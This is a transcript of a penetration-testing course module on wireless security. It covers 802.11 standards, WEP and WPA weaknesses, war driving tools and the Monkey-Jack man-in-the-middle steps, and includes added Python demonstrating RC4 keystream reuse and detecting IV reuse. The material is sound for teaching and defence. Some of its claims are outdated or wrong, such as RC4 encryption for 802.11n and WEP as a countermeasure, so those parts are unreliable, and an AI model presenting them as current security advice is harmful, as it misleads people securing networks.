ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Advanced Penetration Testing and Security Analysis Module 6 Advanced Wireless Testing EC-Council Copyright © by EC-Council All rights reserved. Reproduction is strictly prohibited

Upload: mahmoud-eladawi

Post on 08-Nov-2014



TRANSCRIPT

Page 1: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Advanced Penetration Testing and Security Analysis

Module 6: Advanced Wireless Testing

Page 2: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Module Objective

This module will familiarize you with:

• WarDriving with NetStumbler
• How NetStumbler Works
• “Active” vs. “Passive” WLAN Detection
• Disabling the Beacon
• Running NetStumbler
• Captured Data Using NetStumbler
• Filtering by Channels
• Wireless Penetration Testing with Windows
• AirCrack-ng
• FMS and Korek attacks
• Crack WEP

Page 3: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Wireless Concepts

Page 4: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Wireless Concepts

When most people say ‘Wireless’ these days, they are referring to one of the 802.11 standards.

Wireless communication allows networks to extend to places that might otherwise go untouched by wired networks.

There are three main 802.11 standards: B, A, and G.

802.11 has weak authentication and encryption mechanisms.

Wireless, by its very nature, has no well-defined perimeter, making security more challenging.

Page 5: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

802.11 Types

802.11-Legacy:
• 2 Mbit/sec theoretical
• Uses CSMA/CA for collision detection and avoidance
• Can use either FHSS or DSSS for modulation
• Had no well-defined implementation

802.11b:
• 11 Mbit/sec theoretical (5.9 Mbit usually)
• Uses DSSS modulation, splitting the 2.4 GHz band into 8 b channels
• SSID: Service Set Identifier; used for network differentiation

802.11a:
• Operates in the 5 GHz band
• Uses OFDM modulation
• Theoretical 54 Mbit, realistic ~25 Mbit
• Not backwards compatible with b
• Not widely deployed

Page 6: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

802.11 Types (cont’d)

802.11g:
• Back in the 2.4 GHz band
• Theoretical 54 Mbit, realistic ~25 Mbit
• Supports CCK (for compatibility with b)
• Natively uses OFDM

802.11n:
• It is based on multiple-in/multiple-out (MIMO) technology
• Increased data rate up to 600 Mbps
• RF band: 2.4 GHz or 5 GHz
• Channel width: 20 MHz or 40 MHz

Page 7: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Core Issues with 802.11

No hard perimeter:
• A wired network runs from point A to point B; a wireless network runs all over the block.
• Eavesdropping and packet sniffing thus become trivial.
• Many government facilities cannot use wireless, even with higher-layer encryption, for this reason.
• Perimeter security is sometimes ‘implemented’ by disabling SSID broadcasts. However, ‘stealthed’ networks are still visible.

Page 8: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Core Issues with 802.11 (cont’d)

Performance and easy Denial-of-Service:
• RF communications are easy to take down:
  • Size does matter; the AP with the strongest signal wins.
• With CSMA/CA, performance is crippled:
  • With the addition of WEP, performance drops even further.
• Easy access to the local segment means easy targeted Denial-of-Service attacks on the network level:
  • Packet flooding
  • ARP spoofing
• No standard for roaming and hand-offs

Page 9: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

What’s the Difference?

                          | 802.11      | 802.11a                           | 802.11b              | 802.11g                           | 802.11n
Frequency                 | 2.4 GHz     | 5 GHz                             | 2.4 GHz              | 2.4 GHz                           | 2.4 or 5 GHz
Rate(s)                   | 1 or 2 Mbps | 6, 9, 12, 18, 24, 36, 48, 54 Mbps | 1, 2, 5.5 or 11 Mbps | 6, 9, 12, 18, 24, 36, 48, 54 Mbps | 600 Mbps
Modulation                | FHSS/DSSS   | OFDM                              | DSSS                 | OFDM                              | DSSS/OFDM
Effective Data Throughput | 1.2 Mbps    | 32 Mbps                           | 5 Mbps               | 32 Mbps                           | 100-200 Mbps
Advertised Range          | 300 ft      | 225 ft                            | 300 ft               | 300 ft                            | 600 ft
Encryption                | Yes         | Yes                               | Yes                  | Yes                               | Yes
Encryption Type           | 40 bit RC4  | 40 or 104 bit RC4                 | 40 or 104 bit RC4    | 40 or 104 bit RC4                 | 40 or 104 bit RC4
Authentication            | No          | No                                | No                   | No                                | Yes
Network Support           | Ethernet    | Ethernet                          | Ethernet             | Ethernet                          | WLAN

Page 10: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Other Types of Wireless

HiperLAN2:
• European WLAN standard
• 5 GHz range
• Up to 54 Mbps

Bluetooth:
• Short distance device
• 2.4 GHz
• 721 kbps to 10 Mbps depending on the version

802.16 – Wireless Metropolitan Area Network

Neither are compatible with 802.11 standards.

Page 11: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Other Types of Wireless (cont’d)

Infrared (IR), which works at a frequency just below visible light.

Narrowband, where data is sent and received on specific frequencies:
• A license must be obtained from the FCC for this space.

Spread spectrum technology, which can send data over several frequencies uniformly.

Page 12: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Other Types of Wireless (cont’d)

Page 13: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Spread Spectrum Background

Spread spectrum was developed decades ago by the military to send communications that would be hard to detect or jam.

It involves varying the frequency of a signal over a large portion of the spectrum, instead of being focused as in conventional communications:
• A large part of the security is the mathematical sequence.
• If the sequence is known, there is no added security, only survivability.

Page 14: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Channels

The station and AP must communicate over the same channel:
• The channel is configured at the AP.

When a station initializes or moves from one AP to another, it will tune into the channel the AP is using:
• The client will tune into the strongest signal available because it ‘thinks’ that is the closest AP.

When using several APs, they all need to be set to different channels to ensure cross talk does not occur:
• Cross talk is when an AP picks up signals from another AP and its own signals may get corrupted.
• It requires the AP to do more error recovery and signal filtering.

Page 15: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Access Point

The access point (AP) bridges the wireless network to the wired network.

The station and AP have to be configured to communicate over the same channel.

Page 16: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Service Set ID

Stations and APs use Service Set IDs (SSIDs):
• SSID is a network name that logically contains wireless stations and APs within a specific WLAN segment.

The SSID is usually broadcast by the AP to any listening hosts.

SSID can represent two network segments.

Page 17: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Service Set ID (cont’d)


Page 18: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Default SSIDs

The following are default SSIDs:

SSID                               | Vendor
tsunami                            | Cisco
101                                | 3Com, Symbol
RoamAbout Default Network Name     | Lucent/Cabletron
Default SSID                       | Baystack 650/660
Compaq                             | Compaq
WLAN                               | Addtron, Dlink, SMC
Intel                              | Intel
linksys or Wireless                | Linksys
Wireless                           | Various
MAC Address                        | SOHOware NetBlaster II

Page 19: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Chipsets

Prism II chipsets:
• Well supported in most wireless applications
• Linksys, older DLink
• Can usually be determined by the small N-post adapter on the end of the chipset

Orinoco chipsets:
• Lucent, Avaya, Enterasys
• Usually supported by applications (not NetStumbler)

Cisco chipset:
• Cisco Aironet 350 adapters

Atheros chipset:
• Extend the range and reduce the power consumption of 802.11 wireless networks
• AR5004X Client, AR5004G Client

Page 20: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Wi-Fi Equipment


Page 21: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Expedient Antennas

WLAN can also be fun to experiment with.


Page 22: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Vulnerabilities to 802.1x and RADIUS

Some early 802.1X implementations cannot use the per-session keys outlined in the IEEE 802.1X standard to encrypt the data:
• Such implementations are vulnerable to many of the WEP attacks.

No means of authenticating the access point to the user:
• An attacker can easily spoof an access point and forward a user’s credential to the RADIUS server.

Page 23: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Vulnerabilities to 802.1x and RADIUS (cont’d)

If the RADIUS server is used for authentication methods other than EAP, then the following vulnerabilities can apply:
• The RADIUS shared secret is vulnerable to offline dictionary attack, based on capture of the Response Authenticator or Message-Authenticator attribute:
  • Changing the shared secret between authentication methods will fix the vulnerabilities above.
• RADIUS can still be vulnerable to a brute-force attack.

Page 24: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Vulnerabilities to 802.1x and RADIUS (cont’d)

Page 25: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Vulnerabilities to 802.1x and RADIUS (cont’d)

Page 26: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Vulnerabilities to 802.1x and RADIUS (cont’d)

Page 27: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Vulnerabilities to 802.1x and RADIUS (cont’d)

Page 28: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Vulnerabilities to 802.1x and RADIUS (cont’d)

Page 29: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Vulnerabilities to 802.1x and RADIUS (cont’d)

Page 30: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Wired Equivalent Privacy

Page 31: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Security - WEP

From ANSI/IEEE Std. 802.11:

“3.49 wired equivalent privacy (WEP): The optional cryptographic confidentiality algorithm specified by IEEE 802.11 used to provide data confidentiality that is subjectively equivalent to the confidentiality of a wired local area network (LAN) medium that does not employ cryptographic techniques to enhance privacy.”

Page 32: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Wired Equivalent Privacy (WEP)

Since wireless is inherently easy to eavesdrop on, WEP was created to provide ‘Equivalent Privacy’ to an unsecured wired network.

WEP has three main goals:
• Confidentiality: preventing casual eavesdropping
• Access control: control who is allowed to access the network
• Data integrity: ensure that messages are not tampered with

Page 33: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Wired Equivalent Privacy (WEP) (cont’d)

Some facts about WEP:
• WEP uses RC4 for encryption and CRC32 for integrity checking.
• WEP uses either 40 or 104 bit keys, which are then added to a 24 bit initialization vector (which just happens to be transmitted in the clear).
• WEP uses a shared key structure.
• WEP significantly impacts network performance.

Page 34: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Wired Equivalent Privacy (WEP) (cont’d)

If working under SKA, a WEP key is required for authentication:
• The key can also be used for data encryption.

RC4 is a symmetric algorithm which only encrypts the payload of packets:
• RC4 does not encrypt the header or trailer data.
• The same key is used for encryption and decryption processes.

The 802.11 standard specifies a 40-bit key and many vendors also offer a 104-bit key.

Page 35: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Exclusive OR

Exclusive OR (XOR) functionality: XOR is an operation that is applied to two bits:
• A function in binary mathematics. If both bits are the same, the result is zero (1 + 1 = 0).
• If the bits are different from each other, the result is one (1 + 0 = 1).

Logical “either/or”:
• Output is true if either, but not both, of the inputs are true.
• Output is false if both inputs are false or both inputs are true.

Major function in all of cryptography.

Page 36: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Encryption Process

                          | Character 1 | Character 2 | Character 3 | Character 4
Message                   | 1010101     | 1101001     | 1100001     | 0011010
Values determined by key  | 1101001     | 0010101     | 1101011     | 0010111
Resulting ciphertext      | 0111100     | 1111100     | 0001010     | 0001101

The XOR function combines each message character with the value determined by the key to give the resulting ciphertext.

Page 37: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Encryption Process (cont’d)


Page 38: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Chipping Sequence

Data stream: 1010
Random sequence: 0100101101011001
XOR of the two: 1011101110101001

(Figure: each of the four data bits is spread over four chips of the random sequence.)
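The chipping sequence from the slide, carried through in Python as an added example (not code from the EC-Council module): each data bit is XORed with four chips of the slide's 16-chip sequence, de-spreading with the same sequence recovers the data by majority vote even when one chip per bit is corrupted (the "survivability" of the spread-spectrum slide), and de-spreading with a different sequence does not. The all-zero wrong sequence and the corrupted chip positions are constructed values.

```python
CHIP_SEQUENCE = "0100101101011001"   # the slide's 16-chip "random sequence"
DATA_STREAM = "1010"                 # the slide's 4-bit data stream


def spread(data_bits: str, chips: str) -> str:
    """DSSS spreading: XOR each data bit with its share of the chip sequence
    (here 16 chips / 4 bits = 4 chips per data bit)."""
    if len(chips) % len(data_bits):
        raise ValueError("chip sequence must be a multiple of the data length")
    per_bit = len(chips) // len(data_bits)
    out = []
    for i, bit in enumerate(data_bits):
        for chip in chips[i * per_bit:(i + 1) * per_bit]:
            out.append(str(int(bit) ^ int(chip)))
    return "".join(out)


def despread(signal: str, chips: str, data_len: int) -> str:
    """Receiver side: XOR the received chips with the same sequence, then
    majority-vote each group so a few flipped chips do not flip the data bit."""
    per_bit = len(chips) // data_len
    raw = [int(s) ^ int(c) for s, c in zip(signal, chips)]
    bits = []
    for g in range(data_len):
        group = raw[g * per_bit:(g + 1) * per_bit]
        bits.append("1" if sum(group) * 2 > per_bit else "0")
    return "".join(bits)


def flip_chips(signal: str, positions) -> str:
    """Simulate narrowband interference by inverting the given chip positions
    (constructed damage, one chip per data bit in the demo below)."""
    chips = list(signal)
    for p in positions:
        chips[p] = "0" if chips[p] == "1" else "1"
    return "".join(chips)


if __name__ == "__main__":
    tx = spread(DATA_STREAM, CHIP_SEQUENCE)
    print("XOR of the two:", tx)                                   # 1011101110101001
    print("recovered:", despread(tx, CHIP_SEQUENCE, len(DATA_STREAM)))
    damaged = flip_chips(tx, [0, 5, 10, 15])                        # one bad chip per bit
    print("recovered after interference:", despread(damaged, CHIP_SEQUENCE, 4))
    # Without the sequence, the receiver gets bits that are not the data:
    print("with the wrong sequence:", despread(tx, "0000000000000000", 4))
```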

Page 39: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

WEP Issues

CRC32 is not sufficient to ensure complete cryptographic integrity of a packet:
• By capturing two packets, an attacker can reliably flip a bit in the encrypted stream, and modify the checksum so that the packet is accepted.

IVs are 24 bits:
• An AP broadcasting 1500 byte packets at 11 Mb/s would exhaust the entire IV space in five hours.

Known plaintext attacks:
• When there is an IV collision, it becomes possible to reconstruct the RC4 keystream based off of the IV and the decrypted payload of the packet.

Page 40: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

WEP Issues (cont’d)

Dictionary attacks:
• WEP is password-based

Denial-of-Service:
• Associate and disassociate messages are not authenticated

Eventually, an attacker can construct a decryption table of reconstructed key streams:
• With about 24 GB of space, an attacker can use this table to decrypt WEP packets in real-time

Page 41: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

WEP Issues (cont’d)

A lack of centralized key management makes it difficult to change WEP keys with any regularity.

IV is a value that is used to randomize the key stream value and each packet has an IV value:
• The standard only allows 24 bits, which can be used up within hours at a busy AP.
• IV values will be reused.

The standard does not dictate that each packet must have a unique IV, so vendors use only a small part of the available 24-bit possibilities:
• A mechanism that depends on randomness is not very random at all, and attackers can easily figure out the key stream and decrypt other messages.
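The IV-exhaustion figure and the keystream-reuse problem from the three WEP Issues slides, worked through in Python as an added example (not code from the EC-Council module): a plain RC4, WEP-style framing with the 24-bit IV prepended to the shared key and sent in the clear, the arithmetic behind the five-hour figure, and a defender-side check that flags IV reuse in a set of captured frame bodies. The shared key, IVs and frame payloads are constructed sample values; the CRC32 ICV is left out.

```python
from collections import Counter


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4 (KSA + PRGA): return `length` keystream bytes for `key`."""
    s = list(range(256))
    j = 0
    for i in range(256):                        # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    while len(out) < length:                    # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(shared_key: bytes, iv: bytes, payload: bytes) -> bytes:
    """WEP-style frame body: RC4 seeded with IV || shared key; the 3-byte IV
    travels in the clear in front of the ciphertext (CRC32 ICV omitted)."""
    if len(iv) != 3:
        raise ValueError("WEP IV is 24 bits")
    keystream = rc4_keystream(iv + shared_key, len(payload))
    return iv + xor_bytes(payload, keystream)


def wep_decrypt(shared_key: bytes, frame: bytes) -> bytes:
    iv, body = frame[:3], frame[3:]
    return xor_bytes(body, rc4_keystream(iv + shared_key, len(body)))


def keystream_leak(frame_a: bytes, frame_b: bytes) -> bytes:
    """What an eavesdropper learns from two frames under the same IV, without
    the key: C_a XOR C_b == P_a XOR P_b, because both used one keystream."""
    return xor_bytes(frame_a[3:], frame_b[3:])


def hours_to_exhaust_iv_space(frame_bytes: int = 1500, link_mbps: float = 11.0,
                              iv_bits: int = 24) -> float:
    """Time until a saturated AP has used every IV once; the slide's
    1500-byte, 11 Mb/s case comes out at roughly five hours."""
    seconds_per_frame = frame_bytes * 8 / (link_mbps * 1_000_000)
    return (2 ** iv_bits) * seconds_per_frame / 3600


def find_iv_reuse(frames: list[bytes]) -> dict[str, int]:
    """Defender check over captured frame bodies: IVs seen more than once,
    i.e. keystreams that have been reused on this BSS."""
    counts = Counter(f[:3] for f in frames)
    return {iv.hex(): n for iv, n in counts.items() if n > 1}


if __name__ == "__main__":
    key = bytes.fromhex("0102030405")       # constructed 40-bit shared key
    iv = bytes.fromhex("0a0b0c")            # constructed IV, reused by a careless driver
    p1, p2 = b"GET /index.html", b"POST /login.php"
    f1, f2 = wep_encrypt(key, iv, p1), wep_encrypt(key, iv, p2)
    assert wep_decrypt(key, f1) == p1
    print("C1^C2 == P1^P2:", keystream_leak(f1, f2) == xor_bytes(p1, p2))
    print(f"IV space exhausted in {hours_to_exhaust_iv_space():.2f} h")
    print("IVs reused:", find_iv_reuse([f1, f2, wep_encrypt(key, b"\x00\x00\x01", p1)]))
```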

Page 42: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

WEP - Authentication Phase

When a wireless station wants to access a network, it sends a probe request packet on all channels so that any AP in range will respond.

The AP responds with packets containing the AP’s SSID and other network information:
• When open system authentication (OSA) is configured, the station will send an authentication request to the AP and the AP will make an access decision based on its policy.
• When shared key authentication (SKA) is configured, the AP will send a challenge to the station and the mobile station encrypts it with its WEP key and sends it back to the AP:
  • If the AP can successfully decrypt and obtain the challenge value, the mobile station’s access is authorized.

Page 43: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

WEP - Shared Key Authentication

The requesting station sends the challenge text.

The receiving station:
• Decrypts the challenge using the same shared key.
• Compares it to the challenge text sent earlier.
• If they match, an acknowledgement is sent.
• If no match, sends a negative authentication notice.

Once acknowledged, the transmission is sent.

(Figure: the challenge exchange between Requesting Station and Receiving Station.)

Page 44: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

WEP - Association Phase

After the authentication phase, the station will send the AP an association request packet.

If the AP has a policy to allow this station to access the network, it will associate the station to itself by placing the station in its association table.

A wireless device has to be associated with an AP to access network resources, and not just authenticated.

The authentication and association phases authorize the device, and not the user.

There is no way to know if an unauthorized user has stolen and is using an authorized device.

Page 45: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

WEP Flaws

Two basic flaws undermine its ability to protect against a serious attack.

No defined method for encryption key distribution:
• Pre-shared keys were set once at installation and are rarely (if ever) changed.

Use of RC4, which was designed to be a one-time cipher and not intended for multiple message use:
• Since the pre-shared key is rarely changed, the same key is reused.
• An attacker monitors traffic and finds enough examples to work out the plaintext from message context.
• With knowledge of the ciphertext and plaintext, you can compute the key.

Page 46: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

WEP Attack

It takes at least 10,000 packets to discover the key:
• A large amount of known data is the fastest way of determining as many key streams as possible.

Wep Weggie (part of BSD-Airtools) can be used to generate a large number of small packets:
• The information may be as innocuous as the fields in the protocol header or the DNS name query.
• Monitoring is passive and therefore undetectable.
• Simple tools and instructions are readily available to recover the key.

Page 47: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Wireless Security Technologies

Page 48: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

WPA Interim 802.11 Security

Wi-Fi Protected Access (WPA)

Interim solution between WEP and 802.11i:
• Plugs holes in legacy 802.11 devices
• Typically requires firmware or driver upgrade, but not new hardware
• Subset of 802.11i and is forward compatible

Sponsored by the Wi-Fi Alliance:
• Will require WPA for current certifications

Support announced by Microsoft, Intel, others

Page 49: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

WPA

Works similarly to 802.1X authentication:
• Both clients and AP must be WPA-enabled for encryption to and from the 802.1X EAP server
• Key in a passphrase (master key) in both client and AP
• If the passphrase matches, then the AP allows entry to the network
• The passphrase remains constant, but a new encryption key is generated for each session

Page 50: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

WPA2 (Wi-Fi Protected Access 2)

WPA2 is compatible with the 802.11i standard.

WPA2 provides government grade security by implementing the National Institute of Standards and Technology (NIST) FIPS 140-2 compliant AES encryption algorithm.

WPA2 offers two modes of operation:
• Enterprise: verifies network users through a server.
• Personal: protects against unauthorized network access by utilizing a set-up password.

Page 51: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

802.1X Authentication and EAP

802.1X:
• Framework to control port access between clients, the AP, and servers

Uses Extensible Authentication Protocol (EAP):
• EAP is discussed in RFC 2284
• Uses dynamic keys instead of the static WEP authentication key
• Requires mutual authentication protocol
• User’s transmission must go through the WLAN AP to reach the server performing the authentication
• Permits a number of authentication methods
• RADIUS is the market de facto standard

Page 52: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

EAP Types

EAP-TLS:

• EAP is an extension of PPP providing for additional authentication methods.
• TLS provides for mutual authentication and session key exchange.
• Negotiated mutual key becomes master key for 802.11 TKIP.
• Requires client and server certificates (PKI-based).
• Deployed by Microsoft for its corporate network.
• Shipping in Windows 2000 and XP.
• EAP-TLS is discussed in RFC 2716.

Page 53: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Cisco LEAP

Lightweight Extensible Authentication Protocol

In August 2003, it was discovered that Cisco LEAP is vulnerable to brute-force and dictionary attacks:
• Therefore, Cisco warns users to adhere to strong passwords.

Use PEAP (Protected Extensible Authentication Protocol) instead of LEAP, which supports:
• Digital certificates.
• One-time passwords.

Page 54: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

TKIP (Temporal Key Integrity Protocol)

Quick fix to overcome the encryption key reuse problem with WEP

Still uses WEP RC4, but changes the temporal key every 10K packets

Mandates use of MIC to prevent packet forgery

Uses existing device calculation capabilities to perform the encryption operations

Improves security, but is still only a short-term fix

Page 55: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Wireless Networks Testing

This is a method for testing wireless access to a LAN and is becoming increasingly popular.

However, some fairly alarming problems, security-wise, are common when implementing these technologies.

Expected results:
• The outer-most physical edge of the wireless network.
• The logical boundaries of the wireless network.
• Access points into the network.
• IP range (and possibly DHCP-server) of the wireless network.
• Exploitable "mobile units" (clients).

Page 56: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Wireless Networks Testing (cont’d)

Verify the distance to which the wireless communication extends beyond the physical boundaries of the organization

List equipment needed/tried (antenna, card, amplifier, software, etc.)

Verify the authentication method of the clients

Verify that encryption is configured and running

Verify what key length is used

Verify the IP range of the network

Verify the IP range reachable from the wireless network, and the protocols involved

Probe the network for possible DoS problems

Page 57: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Wireless Communications Testing

This is a method of testing cordless communication devices which may exceed the physical and monitored boundaries of an organization.

Expected results:
• The outer-most physical edge of the wireless communications.
• The logical boundaries of the wireless communications.
• List of communication types.
• Type of wireless communication used and in what spectrum.
• List of frequencies emanating from the target.
• List of vulnerabilities in the wireless communication present.

Page 58: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Report Recommendations

Verify that the organization has an adequate security policy that addresses the use of wireless technology, including the use of 802.11.

Maintain a complete inventory of all wireless devices on the network.

Evaluate the physical access controls to Access Points (APs) and devices controlling them.

Determine if APs are turned off during portions of the day when they will not be in use.

Verify that the AP SSIDs have been changed.

Verify that all wireless clients have anti-virus software installed.

Page 59: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Wireless Attack Countermeasures

Enable 104-bit WEP

Change default SSID and disable its broadcast

Implement another layer of authentication

Physically put AP at the center of the building

Logically put the AP in a DMZ with a firewall between the DMZ and internal network

Implement VPN for wireless stations to use

Configure an ACL on AP and/or firewall to allow only known addresses into the network

Assign static IPs to stations and disable DHCP

Page 60: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Wireless Penetration Testing with Windows

The first step in performing a wireless penetration test is determining which wireless network is the target.

This is usually done by conducting a WarDrive.

Once you’ve determined the correct network to attack, you need to break any encryption used on the network.

Once the security is broken, sniff for sensitive traffic.

Page 61: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Attacks and Tools

Page 62: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

War Driving

War Driving is performed on a laptop/PC with a wireless NIC, antenna (omni-directional is best), sniffers (TCPDump, Ethereal), NetStumbler, and AirSnort or WEPCrack.

NetStumbler finds WLAN APs and logs:

• Network name
• SSID
• MAC address of AP
• Channel heard on
• Signal strength
• If WEP is enabled

AirSnort and WEPCrack run algorithms on captured traffic to crack WEP keys.

Page 63: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

War Driving (cont’d)


Page 64: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

The Jargon – WarChalking

A marking method is only as good as the number of people that know it.

There is a common standard being developed amongst warchalkers to offer a common marking scheme.

Check out www.warchalking.org for more details.


Page 65: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

The Jargon – WarChalking (cont’d)

Bumper Sticker:

Page 66: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

WarPumpkin

WLAN hackers can adapt to seasonal changes:

• Open WLAN, SSID=GoAway, Speed=1.5Mbps

Page 67: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Wireless: Tools of the Trade

Detectors:

• Kismet
• Netstumbler

Crackers:

• Airsnort
• WEPCrack

MITM tools:

• MonkeyJack
• AirJack

Page 68: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Mapping with Kismet

Kismet is a Linux wireless tool

It’s free

Captures all packets received

Supports GPS and mapping

Logging is flexible and configurable

Installation can be difficult

Requires driver and kernel patches

Included with Knoppix

Page 69: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Mapping with Kismet (cont’d)

Comes with own gpsmap program

Does signal strength guessing and interpolation

Not so accurate

Page 70: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Kismet: Screenshot


Page 71: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

WarDriving with NetStumbler

NetStumbler is the application used most by WarDrivers that use a Windows operating system.

While originally designed as a wireless network tool, NetStumbler has grown in popularity due to WarDrivers.

NetStumbler provides radio frequency (RF) signal information and other data related to combining computers and radios.

It also provides information on the band and data format being used, depending on which wireless networking card is being implemented (802.11b, 802.11a, or 802.11g).

Page 72: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

How Does NetStumbler Work?

NetStumbler is an active wireless network detection application that does not passively listen for, or receive, beacons.

It does not collect packets.

If it detects an infrastructure WLAN, it requests the AP’s name.

When it finds an ad-hoc WLAN, it requests the names of all of the peers it sees.

Its interface provides filtering and analysis tools.

Page 73: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

NetStumbler: Screenshot


Page 74: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

“Active” vs. “Passive” WLAN Detection

NetStumbler is an “active” wireless network detection application that takes a specific action to accomplish WLAN detection.

This action sends out a specific data probe called a Probe Request.

The Probe Request frame and the associated Probe Response frame are part of the 802.11 standard.

Applications that employ “passive” detection do not broadcast any signals.

These programs listen to the radio band for any 802.11 traffic that is within range of the wireless card.

Page 75: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Disabling the Beacon

NetStumbler transmits a Broadcast Request probe to discover the WLAN.

Most access points respond to a Broadcast Request by default.

When the access point responds, it transmits its SSID, MAC number, and other information.

Many brands and models of access points allow this feature to be disabled.

Once an access point ceases to respond to a request, NetStumbler can no longer detect it.

If you don’t want your WLAN to show up on the screen of another NetStumbler user, disable the SSID broadcast on your access point.

Page 76: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Running NetStumbler

When NetStumbler starts, it immediately attempts to locate a usable wireless card and a global positioning system (GPS) receiver.

The application also opens a new file with extension ns1 (NetStumbler1).

The file name is derived from the date and time when NetStumbler was started, and is in the YYYYMMDDHHMMSS.ns1 format.

If a wireless card is located, the program begins to scan for nearby access points.

The data from any located access points is immediately entered into the new file.

Page 77: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Captured Data using NetStumbler

Page 78: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Filtering by Channels


Page 79: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Airsnort


Page 80: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

WEPCrack


Page 81: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Monkey-Jack

Attacker launches DoS attack

Victim’s 802.11 card scans channels to search for new AP

Victim’s 802.11 card associates with fake AP on the attack machine

Attack machine associates with real AP

Attack machine is now inserted and can pass frames through in a manner that is transparent to the upper level protocols

Page 82: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

How Monkey-Jack Works

No per-packet authentication:

• Client or AP can easily be spoofed

Client station will actively scan for new AP after being disassociated

Attacker impersonates AP:

• Offers authentication

Legitimate AP is clueless

Page 83: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Before Monkey-Jack


Page 84: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

After Monkey-Jack


Page 85: ECSAv4 Module 06 Advanced Wireless Testing_NoRestriction

Monkey-Jack: Screenshot


